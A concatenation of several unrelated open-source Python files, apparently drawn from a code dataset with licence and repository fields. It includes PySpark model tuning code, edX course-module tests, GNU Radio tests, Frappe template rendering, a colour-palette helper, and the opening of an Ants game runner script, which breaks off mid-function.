# Load information from java_stage to the instance.
bestModel = JavaParams._from_java(java_stage.bestModel())
estimator, epms, evaluator = super(TrainValidationSplitModel,
cls)._from_java_impl(java_stage)
# Create a new instance of this stage.
py_stage = cls(bestModel=bestModel).setEstimator(estimator)
py_stage = py_stage.setEstimatorParamMaps(epms).setEvaluator(evaluator)
py_stage._resetUid(java_stage.uid())
return py_stage
def _to_java(self):
"""
Transfer this instance to a Java TrainValidationSplitModel. Used for ML persistence.
:return: Java object equivalent to this instance.
"""
sc = SparkContext._active_spark_context
# TODO: persst validation metrics as well
_java_obj = JavaParams._new_java_obj(
"org.apache.spark.ml.tuning.TrainValidationSplitModel",
self.uid,
self.bestModel._to_java(),
_py2java(sc, []))
estimator, epms, evaluator = super(TrainValidationSplitModel, self)._to_java_impl()
_java_obj.set("evaluator", evaluator)
_java_obj.set("estimator", estimator)
_java_obj.set("estimatorParamMaps", epms)
return _java_obj
if __name__ == "__main__":
import doctest
from pyspark.sql import SparkSession
globs = globals().copy()
# The small batch size here ensures that we see multiple batches,
# even in these small test examples:
spark = SparkSession.builder\
.master("local[2]")\
.appName("ml.tuning tests")\
.getOrCreate()
sc = spark.sparkContext
globs['sc'] = sc
globs['spark'] = spark
(failure_count, test_count) = doctest.testmod(globs=globs, optionflags=doctest.ELLIPSIS)
spark.stop()
if failure_count:
exit(-1)
| apache-2.0 |
antonve/s4-project-mooc | common/lib/xmodule/xmodule/tests/test_course_module.py | 2 | 15329 | import unittest
from datetime import datetime, timedelta
from fs.memoryfs import MemoryFS
from mock import Mock, patch
import itertools
from xblock.runtime import KvsFieldData, DictKeyValueStore
import xmodule.course_module
from xmodule.modulestore.xml import ImportSystem, XMLModuleStore
from opaque_keys.edx.locations import SlashSeparatedCourseKey
from django.utils.timezone import UTC
ORG = 'test_org'
COURSE = 'test_course'
NOW = datetime.strptime('2013-01-01T01:00:00', '%Y-%m-%dT%H:%M:00').replace(tzinfo=UTC())
class CourseFieldsTestCase(unittest.TestCase):
def test_default_start_date(self):
self.assertEqual(
xmodule.course_module.CourseFields.start.default,
datetime(2030, 1, 1, tzinfo=UTC())
)
class DummySystem(ImportSystem):
@patch('xmodule.modulestore.xml.OSFS', lambda dir: MemoryFS())
def __init__(self, load_error_modules):
xmlstore = XMLModuleStore("data_dir", source_dirs=[],
load_error_modules=load_error_modules)
course_id = SlashSeparatedCourseKey(ORG, COURSE, 'test_run')
course_dir = "test_dir"
error_tracker = Mock()
super(DummySystem, self).__init__(
xmlstore=xmlstore,
course_id=course_id,
course_dir=course_dir,
error_tracker=error_tracker,
load_error_modules=load_error_modules,
field_data=KvsFieldData(DictKeyValueStore()),
)
def get_dummy_course(start, announcement=None, is_new=None, advertised_start=None, end=None, certs='end'):
"""Get a dummy course"""
system = DummySystem(load_error_modules=True)
def to_attrb(n, v):
return '' if v is None else '{0}="{1}"'.format(n, v).lower()
is_new = to_attrb('is_new', is_new)
announcement = to_attrb('announcement', announcement)
advertised_start = to_attrb('advertised_start', advertised_start)
end = to_attrb('end', end)
start_xml = '''
<course org="{org}" course="{course}" display_organization="{org}_display" display_coursenumber="{course}_display"
graceperiod="1 day" url_name="test"
start="{start}"
{announcement}
{is_new}
{advertised_start}
{end}
certificates_display_behavior="{certs}">
<chapter url="hi" url_name="ch" display_name="CH">
<html url_name="h" display_name="H">Two houses, ...</html>
</chapter>
</course>
'''.format(
org=ORG,
course=COURSE,
start=start,
is_new=is_new,
announcement=announcement,
advertised_start=advertised_start,
end=end,
certs=certs,
)
return system.process_xml(start_xml)
class HasEndedMayCertifyTestCase(unittest.TestCase):
"""Double check the semantics around when to finalize courses."""
def setUp(self):
super(HasEndedMayCertifyTestCase, self).setUp()
system = DummySystem(load_error_modules=True)
#sample_xml = """
# <course org="{org}" course="{course}" display_organization="{org}_display" display_coursenumber="{course}_display"
# graceperiod="1 day" url_name="test"
# start="2012-01-01T12:00"
# {end}
# certificates_show_before_end={cert}>
# <chapter url="hi" url_name="ch" display_name="CH">
# <html url_name="h" display_name="H">Two houses, ...</html>
# </chapter>
# </course>
#""".format(org=ORG, course=COURSE)
past_end = (datetime.now() - timedelta(days=12)).strftime("%Y-%m-%dT%H:%M:00")
future_end = (datetime.now() + timedelta(days=12)).strftime("%Y-%m-%dT%H:%M:00")
self.past_show_certs = get_dummy_course("2012-01-01T12:00", end=past_end, certs='early_with_info')
self.past_show_certs_no_info = get_dummy_course("2012-01-01T12:00", end=past_end, certs='early_no_info')
self.past_noshow_certs = get_dummy_course("2012-01-01T12:00", end=past_end, certs='end')
self.future_show_certs = get_dummy_course("2012-01-01T12:00", end=future_end, certs='early_with_info')
self.future_show_certs_no_info = get_dummy_course("2012-01-01T12:00", end=future_end, certs='early_no_info')
self.future_noshow_certs = get_dummy_course("2012-01-01T12:00", end=future_end, certs='end')
#self.past_show_certs = system.process_xml(sample_xml.format(end=past_end, cert=True))
#self.past_noshow_certs = system.process_xml(sample_xml.format(end=past_end, cert=False))
#self.future_show_certs = system.process_xml(sample_xml.format(end=future_end, cert=True))
#self.future_noshow_certs = system.process_xml(sample_xml.format(end=future_end, cert=False))
def test_has_ended(self):
"""Check that has_ended correctly tells us when a course is over."""
self.assertTrue(self.past_show_certs.has_ended())
self.assertTrue(self.past_show_certs_no_info.has_ended())
self.assertTrue(self.past_noshow_certs.has_ended())
self.assertFalse(self.future_show_certs.has_ended())
self.assertFalse(self.future_show_certs_no_info.has_ended())
self.assertFalse(self.future_noshow_certs.has_ended())
def test_may_certify(self):
"""Check that may_certify correctly tells us when a course may wrap."""
self.assertTrue(self.past_show_certs.may_certify())
self.assertTrue(self.past_noshow_certs.may_certify())
self.assertTrue(self.past_show_certs_no_info.may_certify())
self.assertTrue(self.future_show_certs.may_certify())
self.assertTrue(self.future_show_certs_no_info.may_certify())
self.assertFalse(self.future_noshow_certs.may_certify())
class IsNewCourseTestCase(unittest.TestCase):
"""Make sure the property is_new works on courses"""
def setUp(self):
super(IsNewCourseTestCase, self).setUp()
# Needed for test_is_newish
datetime_patcher = patch.object(
xmodule.course_module, 'datetime',
Mock(wraps=datetime)
)
mocked_datetime = datetime_patcher.start()
mocked_datetime.now.return_value = NOW
self.addCleanup(datetime_patcher.stop)
@patch('xmodule.course_module.datetime.now')
def test_sorting_score(self, gmtime_mock):
gmtime_mock.return_value = NOW
day1 = '2012-01-01T12:00'
day2 = '2012-01-02T12:00'
dates = [
# Announce date takes priority over actual start
# and courses announced on a later date are newer
# than courses announced for an earlier date
((day1, day2, None), (day1, day1, None), self.assertLess),
((day1, day1, None), (day2, day1, None), self.assertEqual),
# Announce dates take priority over advertised starts
((day1, day2, day1), (day1, day1, day1), self.assertLess),
((day1, day1, day2), (day2, day1, day2), self.assertEqual),
# Later start == newer course
((day2, None, None), (day1, None, None), self.assertLess),
((day1, None, None), (day1, None, None), self.assertEqual),
# Non-parseable advertised starts are ignored in preference to actual starts
((day2, None, "Spring"), (day1, None, "Fall"), self.assertLess),
((day1, None, "Spring"), (day1, None, "Fall"), self.assertEqual),
# Partially parsable advertised starts should take priority over start dates
((day2, None, "October 2013"), (day2, None, "October 2012"), self.assertLess),
((day2, None, "October 2013"), (day1, None, "October 2013"), self.assertEqual),
# Parseable advertised starts take priority over start dates
((day1, None, day2), (day1, None, day1), self.assertLess),
((day2, None, day2), (day1, None, day2), self.assertEqual),
]
for a, b, assertion in dates:
a_score = get_dummy_course(start=a[0], announcement=a[1], advertised_start=a[2]).sorting_score
b_score = get_dummy_course(start=b[0], announcement=b[1], advertised_start=b[2]).sorting_score
print "Comparing %s to %s" % (a, b)
assertion(a_score, b_score)
start_advertised_settings = [
# start, advertised, result, is_still_default, date_time_result
('2012-12-02T12:00', None, 'Dec 02, 2012', False, u'Dec 02, 2012 at 12:00 UTC'),
('2012-12-02T12:00', '2011-11-01T12:00', 'Nov 01, 2011', False, u'Nov 01, 2011 at 12:00 UTC'),
('2012-12-02T12:00', 'Spring 2012', 'Spring 2012', False, 'Spring 2012'),
('2012-12-02T12:00', 'November, 2011', 'November, 2011', False, 'November, 2011'),
(xmodule.course_module.CourseFields.start.default, None, 'TBD', True, 'TBD'),
(xmodule.course_module.CourseFields.start.default, 'January 2014', 'January 2014', False, 'January 2014'),
]
@patch('xmodule.course_module.datetime.now')
def test_start_date_text(self, gmtime_mock):
gmtime_mock.return_value = NOW
for s in self.start_advertised_settings:
d = get_dummy_course(start=s[0], advertised_start=s[1])
print "Checking start=%s advertised=%s" % (s[0], s[1])
self.assertEqual(d.start_datetime_text(), s[2])
@patch('xmodule.course_module.datetime.now')
def test_start_date_time_text(self, gmtime_mock):
gmtime_mock.return_value = NOW
for setting in self.start_advertised_settings:
course = get_dummy_course(start=setting[0], advertised_start=setting[1])
print "Checking start=%s advertised=%s" % (setting[0], setting[1])
self.assertEqual(course.start_datetime_text("DATE_TIME"), setting[4])
def test_start_date_is_default(self):
for s in self.start_advertised_settings:
d = get_dummy_course(start=s[0], advertised_start=s[1])
self.assertEqual(d.start_date_is_still_default, s[3])
def test_display_organization(self):
descriptor = get_dummy_course(start='2012-12-02T12:00', is_new=True)
self.assertNotEqual(descriptor.location.org, descriptor.display_org_with_default)
self.assertEqual(descriptor.display_org_with_default, "{0}_display".format(ORG))
def test_display_coursenumber(self):
descriptor = get_dummy_course(start='2012-12-02T12:00', is_new=True)
self.assertNotEqual(descriptor.location.course, descriptor.display_number_with_default)
self.assertEqual(descriptor.display_number_with_default, "{0}_display".format(COURSE))
def test_is_newish(self):
descriptor = get_dummy_course(start='2012-12-02T12:00', is_new=True)
assert(descriptor.is_newish is True)
descriptor = get_dummy_course(start='2013-02-02T12:00', is_new=False)
assert(descriptor.is_newish is False)
descriptor = get_dummy_course(start='2013-02-02T12:00', is_new=True)
assert(descriptor.is_newish is True)
descriptor = get_dummy_course(start='2013-01-15T12:00')
assert(descriptor.is_newish is True)
descriptor = get_dummy_course(start='2013-03-01T12:00')
assert(descriptor.is_newish is True)
descriptor = get_dummy_course(start='2012-10-15T12:00')
assert(descriptor.is_newish is False)
descriptor = get_dummy_course(start='2012-12-31T12:00')
assert(descriptor.is_newish is True)
def test_end_date_text(self):
# No end date set, returns empty string.
d = get_dummy_course('2012-12-02T12:00')
self.assertEqual('', d.end_datetime_text())
d = get_dummy_course('2012-12-02T12:00', end='2014-9-04T12:00')
self.assertEqual('Sep 04, 2014', d.end_datetime_text())
def test_end_date_time_text(self):
# No end date set, returns empty string.
course = get_dummy_course('2012-12-02T12:00')
self.assertEqual('', course.end_datetime_text("DATE_TIME"))
course = get_dummy_course('2012-12-02T12:00', end='2014-9-04T12:00')
self.assertEqual('Sep 04, 2014 at 12:00 UTC', course.end_datetime_text("DATE_TIME"))
class DiscussionTopicsTestCase(unittest.TestCase):
def test_default_discussion_topics(self):
d = get_dummy_course('2012-12-02T12:00')
self.assertEqual({'General': {'id': 'i4x-test_org-test_course-course-test'}}, d.discussion_topics)
class TeamsConfigurationTestCase(unittest.TestCase):
"""
Tests for the configuration of teams and the helper methods for accessing them.
"""
def setUp(self):
super(TeamsConfigurationTestCase, self).setUp()
self.course = get_dummy_course('2012-12-02T12:00')
self.course.teams_configuration = dict()
self.count = itertools.count()
def add_team_configuration(self, max_team_size=3, topics=None):
""" Add a team configuration to the course. """
teams_configuration = {}
teams_configuration["topics"] = [] if topics is None else topics
if max_team_size is not None:
teams_configuration["max_team_size"] = max_team_size
self.course.teams_configuration = teams_configuration
def make_topic(self):
""" Make a sample topic dictionary. """
next_num = self.count.next()
topic_id = "topic_id_{}".format(next_num)
display_name = "Display Name {}".format(next_num)
description = "Description {}".format(next_num)
return {"display_name": display_name, "description": description, "id": topic_id}
def test_teams_enabled_new_course(self):
# Make sure we can detect when no teams exist.
self.assertFalse(self.course.teams_enabled)
# add topics
self.add_team_configuration(max_team_size=4, topics=[self.make_topic()])
self.assertTrue(self.course.teams_enabled)
# remove them again
self.add_team_configuration(max_team_size=4, topics=[])
self.assertFalse(self.course.teams_enabled)
def test_teams_enabled_max_size_only(self):
self.add_team_configuration(max_team_size=4)
self.assertFalse(self.course.teams_enabled)
def test_teams_enabled_no_max_size(self):
self.add_team_configuration(max_team_size=None, topics=[self.make_topic()])
self.assertTrue(self.course.teams_enabled)
def test_teams_max_size_no_teams_configuration(self):
self.assertIsNone(self.course.teams_max_size)
def test_teams_max_size_with_teams_configured(self):
size = 4
self.add_team_configuration(max_team_size=size, topics=[self.make_topic(), self.make_topic()])
self.assertTrue(self.course.teams_enabled)
self.assertEqual(size, self.course.teams_max_size)
def test_teams_topics_no_teams(self):
self.assertIsNone(self.course.teams_topics)
def test_teams_topics_no_topics(self):
self.add_team_configuration(max_team_size=4)
self.assertEqual(self.course.teams_topics, [])
def test_teams_topics_with_topics(self):
topics = [self.make_topic(), self.make_topic()]
self.add_team_configuration(max_team_size=4, topics=topics)
self.assertTrue(self.course.teams_enabled)
self.assertEqual(self.course.teams_topics, topics)
| agpl-3.0 |
gnychis/gnuradio-3.5.0-dmr | gnuradio-core/src/python/gnuradio/gr/qa_fsk_stuff.py | 11 | 2664 | #!/usr/bin/env python
#
# Copyright 2004,2007,2010 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# GNU Radio is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# GNU Radio is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GNU Radio; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
from gnuradio import gr, gr_unittest
import math
def sincos(x):
return math.cos(x) + math.sin(x) * 1j
class test_bytes_to_syms (gr_unittest.TestCase):
def setUp (self):
self.tb = gr.top_block ()
def tearDown (self):
self.tb = None
def test_bytes_to_syms_001 (self):
src_data = (0x01, 0x80, 0x03)
expected_result = (-1, -1, -1, -1, -1, -1, -1, +1,
+1, -1, -1, -1, -1, -1, -1, -1,
-1, -1, -1, -1, -1, -1, +1, +1)
src = gr.vector_source_b (src_data)
op = gr.bytes_to_syms ()
dst = gr.vector_sink_f ()
self.tb.connect (src, op)
self.tb.connect (op, dst)
self.tb.run ()
result_data = dst.data ()
self.assertEqual (expected_result, result_data)
def test_simple_framer (self):
src_data = (0x00, 0x11, 0x22, 0x33,
0x44, 0x55, 0x66, 0x77,
0x88, 0x99, 0xaa, 0xbb,
0xcc, 0xdd, 0xee, 0xff)
expected_result = (
0xac, 0xdd, 0xa4, 0xe2, 0xf2, 0x8c, 0x20, 0xfc, 0x00, 0x00, 0x11, 0x22, 0x33, 0x55,
0xac, 0xdd, 0xa4, 0xe2, 0xf2, 0x8c, 0x20, 0xfc, 0x01, 0x44, 0x55, 0x66, 0x77, 0x55,
0xac, 0xdd, 0xa4, 0xe2, 0xf2, 0x8c, 0x20, 0xfc, 0x02, 0x88, 0x99, 0xaa, 0xbb, 0x55,
0xac, 0xdd, 0xa4, 0xe2, 0xf2, 0x8c, 0x20, 0xfc, 0x03, 0xcc, 0xdd, 0xee, 0xff, 0x55)
src = gr.vector_source_b (src_data)
op = gr.simple_framer (4)
dst = gr.vector_sink_b ()
self.tb.connect (src, op)
self.tb.connect (op, dst)
self.tb.run ()
result_data = dst.data ()
self.assertEqual (expected_result, result_data)
if __name__ == '__main__':
gr_unittest.run(test_bytes_to_syms, "test_bytes_to_syms.xml")
| gpl-3.0 |
pawaranand/phr-frappe | frappe/website/template.py | 16 | 2988 | # Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
import frappe
from frappe.utils import strip_html
from frappe.website.utils import scrub_relative_urls
from jinja2.utils import concat
from jinja2 import meta
import re
def render_blocks(context):
"""returns a dict of block name and its rendered content"""
out = {}
env = frappe.get_jenv()
def _render_blocks(template_path):
source = frappe.local.jloader.get_source(frappe.local.jenv, template_path)[0]
for referenced_template_path in meta.find_referenced_templates(env.parse(source)):
if referenced_template_path:
_render_blocks(referenced_template_path)
template = frappe.get_template(template_path)
for block, render in template.blocks.items():
out[block] = scrub_relative_urls(concat(render(template.new_context(context))))
_render_blocks(context["template"])
# default blocks if not found
if "title" not in out and out.get("header"):
out["title"] = out["header"]
if "title" not in out:
out["title"] = context.get("title")
if "header" not in out and out.get("title"):
out["header"] = out["title"]
if out.get("header") and not out["header"].startswith("<h"):
out["header"] = "<h2>" + out["header"] + "</h2>"
if "breadcrumbs" not in out:
if context.doc and hasattr(context.doc, "get_parents"):
context.parents = context.doc.get_parents(context)
out["breadcrumbs"] = scrub_relative_urls(
frappe.get_template("templates/includes/breadcrumbs.html").render(context))
if "meta_block" not in out:
out["meta_block"] = frappe.get_template("templates/includes/meta_block.html").render(context)
out["no_sidebar"] = context.get("no_sidebar", 0)
if "<!-- no-sidebar -->" in out.get("content", ""):
out["no_sidebar"] = 1
if "<!-- title:" in out.get("content", ""):
out["title"] = re.findall('<!-- title:([^>]*) -->', out.get("content"))[0].strip()
if "{index}" in out.get("content", "") and context.get("children"):
html = frappe.get_template("templates/includes/static_index.html").render({
"items": context["children"]})
out["content"] = out["content"].replace("{index}", html)
if "{next}" in out.get("content", ""):
next_item = context.doc.get_next()
if next_item:
if next_item.name[0]!="/": next_item.name = "/" + next_item.name
html = '''<p><br><a href="{name}" class="btn btn-primary">
{title} <i class="icon-chevron-right"></i></a>
</p>'''.format(**next_item)
out["content"] = out["content"].replace("{next}", html)
if "sidebar" not in out and not out.get("no_sidebar"):
out["sidebar"] = scrub_relative_urls(
frappe.get_template("templates/includes/sidebar.html").render(context))
out["title"] = strip_html(out.get("title") or "")
# remove style and script tags from blocks
out["style"] = re.sub("</?style[^<>]*>", "", out.get("style") or "")
out["script"] = re.sub("</?script[^<>]*>", "", out.get("script") or "")
return out
| mit |
percyfal/snakemakelib-core | snakemakelib/plot/bokeh/color.py | 1 | 1126 | # Copyright (C) 2015 by Per Unneberg
import math
import pandas.core.common as com
from bokeh.palettes import brewer as bokeh_brewer
from .palettes import brewer as snakemakelib_brewer
import logging
logger = logging.getLogger(__name__)
MINSIZE = 3
MAXSIZE = 9 # FIXME: some palettes have 9 as max, some 11
brewer = bokeh_brewer
brewer.update(snakemakelib_brewer)
def colorbrewer(size=MINSIZE, palette="Paired", datalen=None):
"""Generate a color palette following colorbrewer.
Args:
size (int): size of desired palette
palette (str): name of palette
datalen (int): length of data vector. If None, the palette size
will equal size, else the colors will be reused to fill
up a vector of length datalen
Returns:
palette (list): list of colors
"""
size = max(MINSIZE, min(size, MAXSIZE))
if datalen <= MAXSIZE and datalen >= MINSIZE:
size = datalen
colors = brewer[palette][size]
if datalen > size:
colors = colors * math.ceil(datalen / size)
return colors[0:datalen]
else:
return colors
| mit |
jacinda/ant | playgame.py | 1 | 20674 | #!/usr/bin/env python
from __future__ import print_function
import traceback
import sys
import os
import time
from optparse import OptionParser, OptionGroup
import random
import cProfile
import visualizer.visualize_locally
import json
try:
from StringIO import StringIO
except ImportError:
from io import StringIO
from ants import Ants
sys.path.append("../worker")
try:
from engine import run_game
except ImportError:
# this can happen if we're launched with cwd outside our own dir
# get our full path, then work relative from that
cmd_folder = os.path.dirname(os.path.abspath(__file__))
if cmd_folder not in sys.path:
sys.path.insert(0, cmd_folder)
sys.path.append(cmd_folder + "/../worker")
# try again
from engine import run_game
# make stderr red text
try:
import colorama
colorama.init()
colorize = True
color_default = (colorama.Fore.RED)
color_reset = (colorama.Style.RESET_ALL)
except:
colorize = False
color_default = None
color_reset = None
class Colorize(object):
def __init__(self, file, color=color_default):
self.file = file
self.color = color
self.reset = color_reset
def write(self, data):
if self.color:
self.file.write(''.join(self.color))
self.file.write(data)
if self.reset:
self.file.write(''.join(self.reset))
def flush(self):
self.file.flush()
def close(self):
self.file.close()
if colorize:
stderr = Colorize(sys.stderr)
else:
stderr = sys.stderr
class Comment(object):
def __init__(self, file):
self.file = file
self.last_char = '\n'
def write(self, data):
for char in data:
if self.last_char == '\n':
self.file.write('# ')
self.file.write(char)
self.last_char = char
def flush(self):
self.file.flush()
def close(self):
self.file.close()
class Tee(object):
''' Write to multiple files at once '''
def __init__(self, *files):
self.files = files
def write(self, data):
for file in self.files:
file.write(data)
def flush(self):
for file in self.files:
file.flush()
def close(self):
for file in self.files:
file.close()
def main(argv):
usage ="Usage: %prog [options] map bot1 bot2\n\nYou must specify a map file."
parser = OptionParser(usage=usage)
# map to be played
# number of players is determined by the map file
parser.add_option("-m", "--map_file", dest="map",
help="Name of the map file")
# maximum number of turns that the game will be played
parser.add_option("-t", "--turns", dest="turns",
default=1000, type="int",
help="Number of turns in the game")
parser.add_option("--serial", dest="serial",
action="store_true",
help="Run bots in serial, instead of parallel.")
parser.add_option("--turntime", dest="turntime",
default=1000, type="int",
help="Amount of time to give each bot, in milliseconds")
parser.add_option("--loadtime", dest="loadtime",
default=3000, type="int",
help="Amount of time to give for load, in milliseconds")
parser.add_option("-r", "--rounds", dest="rounds",
default=1, type="int",
help="Number of rounds to play")
parser.add_option("--player_seed", dest="player_seed",
default=None, type="int",
help="Player seed for the random number generator")
parser.add_option("--engine_seed", dest="engine_seed",
default=None, type="int",
help="Engine seed for the random number generator")
parser.add_option('--strict', dest='strict',
action='store_true', default=False,
help='Strict mode enforces valid moves for bots')
parser.add_option('--capture_errors', dest='capture_errors',
action='store_true', default=False,
help='Capture errors and stderr in game result')
parser.add_option('--end_wait', dest='end_wait',
default=0, type="float",
help='Seconds to wait at end for bots to process end')
parser.add_option('--secure_jail', dest='secure_jail',
action='store_true', default=False,
help='Use the secure jail for each bot (*nix only)')
parser.add_option('--fill', dest='fill',
action='store_true', default=False,
help='Fill up extra player starts with last bot specified')
parser.add_option('-p', '--position', dest='position',
default=0, type='int',
help='Player position for first bot specified')
# ants specific game options
game_group = OptionGroup(parser, "Game Options", "Options that affect the game mechanics for ants")
game_group.add_option("--attack", dest="attack",
default="focus",
help="Attack method to use for engine. (closest, focus, support, damage)")
game_group.add_option("--kill_points", dest="kill_points",
default=2, type="int",
help="Points awarded for killing a hill")
game_group.add_option("--food", dest="food",
default="symmetric",
help="Food spawning method. (none, random, sections, symmetric)")
game_group.add_option("--viewradius2", dest="viewradius2",
default=77, type="int",
help="Vision radius of ants squared")
game_group.add_option("--spawnradius2", dest="spawnradius2",
default=1, type="int",
help="Spawn radius of ants squared")
game_group.add_option("--attackradius2", dest="attackradius2",
default=5, type="int",
help="Attack radius of ants squared")
game_group.add_option("--food_rate", dest="food_rate", nargs=2, type="int", default=(5,11),
help="Numerator of food per turn per player rate")
game_group.add_option("--food_turn", dest="food_turn", nargs=2, type="int", default=(19,37),
help="Denominator of food per turn per player rate")
game_group.add_option("--food_start", dest="food_start", nargs=2, type="int", default=(75,175),
help="One over percentage of land area filled with food at start")
game_group.add_option("--food_visible", dest="food_visible", nargs=2, type="int", default=(3,5),
help="Amount of food guaranteed to be visible to starting ants")
game_group.add_option("--carry_food", dest="carry_food", type="int", default=100,
help="Amount of food that ants can carry. If carry_food==0, food is teleported to hill (original game behaviour)")
game_group.add_option("--cutoff_turn", dest="cutoff_turn", type="int", default=150,
help="Number of turns cutoff percentage is maintained to end game early")
game_group.add_option("--cutoff_percent", dest="cutoff_percent", type="float", default=0.85,
help="Number of turns cutoff percentage is maintained to end game early")
game_group.add_option("--scenario", dest="scenario",
action='store_true', default=False)
parser.add_option_group(game_group)
# the log directory must be specified for any logging to occur, except:
# bot errors to stderr
# verbose levels 1 & 2 to stdout and stderr
# profiling to stderr
# the log directory will contain
# the replay or stream file used by the visualizer, if requested
# the bot input/output/error logs, if requested
log_group = OptionGroup(parser, "Logging Options", "Options that control the logging")
log_group.add_option("-g", "--game", dest="game_id", default=0, type='int',
help="game id to start at when numbering log files")
log_group.add_option("-l", "--log_dir", dest="log_dir", default=None,
help="Directory to dump replay files to.")
log_group.add_option('-R', '--log_replay', dest='log_replay',
action='store_true', default=False),
log_group.add_option('-S', '--log_stream', dest='log_stream',
action='store_true', default=False),
log_group.add_option("-I", "--log_input", dest="log_input",
action="store_true", default=False,
help="Log input streams sent to bots")
log_group.add_option("-O", "--log_output", dest="log_output",
action="store_true", default=False,
help="Log output streams from bots")
log_group.add_option("-E", "--log_error", dest="log_error",
action="store_true", default=False,
help="log error streams from bots")
log_group.add_option('-e', '--log_stderr', dest='log_stderr',
action='store_true', default=False,
help='additionally log bot errors to stderr')
log_group.add_option('-o', '--log_stdout', dest='log_stdout',
action='store_true', default=False,
help='additionally log replay/stream to stdout')
# verbose will not print bot input/output/errors
# only info+debug will print bot error output
log_group.add_option("-v", "--verbose", dest="verbose",
action='store_true', default=False,
help="Print out status as game goes.")
log_group.add_option("--profile", dest="profile",
action="store_true", default=False,
help="Run under the python profiler")
parser.add_option("--nolaunch", dest="nolaunch",
action='store_true', default=False,
help="Prevent visualizer from launching")
log_group.add_option("--html", dest="html_file",
default=None,
help="Output file name for an html replay")
parser.add_option_group(log_group)
(opts, args) = parser.parse_args(argv)
if opts.map is None or not os.path.exists(opts.map):
parser.print_help()
return -1
try:
if opts.profile:
# put profile file into output dir if we can
prof_file = "ants.profile"
if opts.log_dir:
prof_file = os.path.join(opts.log_dir, prof_file)
# cProfile needs to be explitly told about out local and global context
print("Running profile and outputting to {0}".format(prof_file,), file=stderr)
cProfile.runctx("run_rounds(opts,args)", globals(), locals(), prof_file)
else:
# only use psyco if we are not profiling
# (psyco messes with profiling)
try:
import psyco
psyco.full()
except ImportError:
pass
run_rounds(opts,args)
return 0
except Exception:
traceback.print_exc()
return -1
def run_rounds(opts,args):
def get_cmd_wd(cmd, exec_rel_cwd=False):
''' get the proper working directory from a command line '''
new_cmd = []
wd = None
for i, part in reversed(list(enumerate(cmd.split()))):
if wd == None and os.path.exists(part):
wd = os.path.dirname(os.path.realpath(part))
basename = os.path.basename(part)
if i == 0:
if exec_rel_cwd:
new_cmd.insert(0, os.path.join(".", basename))
else:
new_cmd.insert(0, part)
else:
new_cmd.insert(0, basename)
else:
new_cmd.insert(0, part)
return wd, ' '.join(new_cmd)
def get_cmd_name(cmd):
''' get the name of a bot from the command line '''
for i, part in enumerate(reversed(cmd.split())):
if os.path.exists(part):
return os.path.basename(part)
# this split of options is not needed, but left for documentation
game_options = {
"map": opts.map,
"attack": opts.attack,
"kill_points": opts.kill_points,
"food": opts.food,
"viewradius2": opts.viewradius2,
"attackradius2": opts.attackradius2,
"spawnradius2": opts.spawnradius2,
"loadtime": opts.loadtime,
"turntime": opts.turntime,
"turns": opts.turns,
"food_rate": opts.food_rate,
"food_turn": opts.food_turn,
"food_start": opts.food_start,
"food_visible": opts.food_visible,
"carry_food": opts.carry_food,
"cutoff_turn": opts.cutoff_turn,
"cutoff_percent": opts.cutoff_percent,
"scenario": opts.scenario }
if opts.player_seed != None:
game_options['player_seed'] = opts.player_seed
if opts.engine_seed != None:
game_options['engine_seed'] = opts.engine_seed
engine_options = {
"loadtime": opts.loadtime,
"turntime": opts.turntime,
"map_file": opts.map,
"turns": opts.turns,
"log_replay": opts.log_replay,
"log_stream": opts.log_stream,
"log_input": opts.log_input,
"log_output": opts.log_output,
"log_error": opts.log_error,
"serial": opts.serial,
"strict": opts.strict,
"capture_errors": opts.capture_errors,
"secure_jail": opts.secure_jail,
"end_wait": opts.end_wait }
for round in range(opts.rounds):
# initialize game
game_id = round + opts.game_id
with open(opts.map, 'r') as map_file:
game_options['map'] = map_file.read()
if opts.engine_seed:
game_options['engine_seed'] = opts.engine_seed + round
game = Ants(game_options)
# initialize bots
bots = [get_cmd_wd(arg, exec_rel_cwd=opts.secure_jail) for arg in args]
bot_count = len(bots)
# insure correct number of bots, or fill in remaining positions
if game.num_players != len(bots):
if game.num_players > len(bots) and opts.fill:
extra = game.num_players - len(bots)
for _ in range(extra):
bots.append(bots[-1])
else:
print("Incorrect number of bots for map. Need {0}, got {1}"
.format(game.num_players, len(bots)), file=stderr)
for arg in args:
print("Bot Cmd: {0}".format(arg), file=stderr)
break
bot_count = len(bots)
# move position of first bot specified
if opts.position > 0 and opts.position <= len(bots):
first_bot = bots[0]
bots = bots[1:]
bots.insert(opts.position, first_bot)
# initialize file descriptors
if opts.log_dir and not os.path.exists(opts.log_dir):
os.mkdir(opts.log_dir)
if not opts.log_replay and not opts.log_stream and (opts.log_dir or opts.log_stdout):
opts.log_replay = True
replay_path = None # used for visualizer launch
if opts.log_replay:
if opts.log_dir:
replay_path = os.path.join(opts.log_dir, '{0}.replay'.format(game_id))
engine_options['replay_log'] = open(replay_path, 'w')
if opts.log_stdout:
if 'replay_log' in engine_options and engine_options['replay_log']:
engine_options['replay_log'] = Tee(sys.stdout, engine_options['replay_log'])
else:
engine_options['replay_log'] = sys.stdout
else:
engine_options['replay_log'] = None
if opts.log_stream:
if opts.log_dir:
engine_options['stream_log'] = open(os.path.join(opts.log_dir, '{0}.stream'.format(game_id)), 'w')
if opts.log_stdout:
if engine_options['stream_log']:
engine_options['stream_log'] = Tee(sys.stdout, engine_options['stream_log'])
else:
engine_options['stream_log'] = sys.stdout
else:
engine_options['stream_log'] = None
if opts.log_input and opts.log_dir:
engine_options['input_logs'] = [open(os.path.join(opts.log_dir, '{0}.bot{1}.input'.format(game_id, i)), 'w')
for i in range(bot_count)]
else:
engine_options['input_logs'] = None
if opts.log_output and opts.log_dir:
engine_options['output_logs'] = [open(os.path.join(opts.log_dir, '{0}.bot{1}.output'.format(game_id, i)), 'w')
for i in range(bot_count)]
else:
engine_options['output_logs'] = None
if opts.log_error and opts.log_dir:
if opts.log_stderr:
if opts.log_stdout:
